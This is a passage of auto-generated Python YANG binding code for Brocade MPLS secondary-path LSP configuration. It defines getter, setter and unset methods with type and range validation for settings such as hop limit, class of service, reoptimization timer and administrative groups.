self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_adaptive(self):
"""
Getter method for lsp_adaptive, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_adaptive (empty)
"""
return self.__lsp_adaptive
def _set_lsp_adaptive(self, v, load=False):
"""
Setter method for lsp_adaptive, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_adaptive (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_adaptive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_adaptive() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_adaptive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_adaptive = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_adaptive(self):
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_reoptimize_timer(self):
"""
Getter method for lsp_reoptimize_timer, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_reoptimize_timer (uint32)
"""
return self.__lsp_reoptimize_timer
def _set_lsp_reoptimize_timer(self, v, load=False):
"""
Setter method for lsp_reoptimize_timer, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_reoptimize_timer (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_reoptimize_timer is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_reoptimize_timer() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_reoptimize_timer must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_reoptimize_timer = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_reoptimize_timer(self):
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_commit(self):
"""
Getter method for lsp_commit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_commit (empty)
"""
return self.__lsp_commit
def _set_lsp_commit(self, v, load=False):
"""
Setter method for lsp_commit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_commit (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_commit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_commit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_commit must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__lsp_commit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_commit(self):
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_lsp_record(self):
"""
Getter method for lsp_record, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_record (enable-disable)
"""
return self.__lsp_record
def _set_lsp_record(self, v, load=False):
"""
Setter method for lsp_record, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_record (enable-disable)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_record is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_record() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_record must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__lsp_record = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_record(self):
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_lsp_cos(self):
"""
Getter method for lsp_cos, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cos (uint32)
"""
return self.__lsp_cos
def _set_lsp_cos(self, v, load=False):
"""
Setter method for lsp_cos, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cos (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_cos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_cos() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cos must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__lsp_cos = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cos(self):
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
def _get_lsp_hop_limit(self):
"""
Getter method for lsp_hop_limit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_hop_limit (uint16)
"""
return self.__lsp_hop_limit
def _set_lsp_hop_limit(self, v, load=False):
"""
Setter method for lsp_hop_limit, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_hop_limit (uint16)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_hop_limit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_hop_limit() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_hop_limit must be of a type compatible with uint16""",
'defined-type': "uint16",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)""",
})
self.__lsp_hop_limit = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_hop_limit(self):
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
def _get_lsp_cspf_computation_mode(self):
"""
Getter method for lsp_cspf_computation_mode, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cspf_computation_mode (cspf-computation-mode)
"""
return self.__lsp_cspf_computation_mode
def _set_lsp_cspf_computation_mode(self, v, load=False):
"""
Setter method for lsp_cspf_computation_mode, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_cspf_computation_mode (cspf-computation-mode)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_cspf_computation_mode is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_cspf_computation_mode() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_cspf_computation_mode must be of a type compatible with cspf-computation-mode""",
'defined-type': "brocade-mpls:cspf-computation-mode",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)""",
})
self.__lsp_cspf_computation_mode = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_cspf_computation_mode(self):
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
def _get_lsp_traffic_engineering(self):
"""
Getter method for lsp_traffic_engineering, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_traffic_engineering (container)
"""
return self.__lsp_traffic_engineering
def _set_lsp_traffic_engineering(self, v, load=False):
"""
Setter method for lsp_traffic_engineering, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_traffic_engineering (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_traffic_engineering is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_traffic_engineering() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_traffic_engineering must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__lsp_traffic_engineering = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_traffic_engineering(self):
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_priority(self):
"""
Getter method for priority, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/priority (container)
"""
return self.__priority
def _set_priority(self, v, load=False):
"""
Setter method for priority, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/priority (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_priority() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
def _get_lsp_exclude_any(self):
"""
Getter method for lsp_exclude_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_exclude_any (string)
"""
return self.__lsp_exclude_any
def _set_lsp_exclude_any(self, v, load=False):
"""
Setter method for lsp_exclude_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_exclude_any (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_exclude_any is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_exclude_any() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_exclude_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_exclude_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_exclude_any(self):
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_any(self):
"""
Getter method for lsp_include_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_any (string)
"""
return self.__lsp_include_any
def _set_lsp_include_any(self, v, load=False):
"""
Setter method for lsp_include_any, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_any (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_include_any is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_include_any() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_any must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_any = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_any(self):
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
def _get_lsp_include_all(self):
"""
Getter method for lsp_include_all, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_all (string)
"""
return self.__lsp_include_all
def _set_lsp_include_all(self, v, load=False):
"""
Setter method for lsp_include_all, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/lsp_include_all (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_lsp_include_all is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lsp_include_all() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """lsp_include_all must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__lsp_include_all = t
if hasattr(self, '_set'):
self._set()
def _unset_lsp_include_all(self):
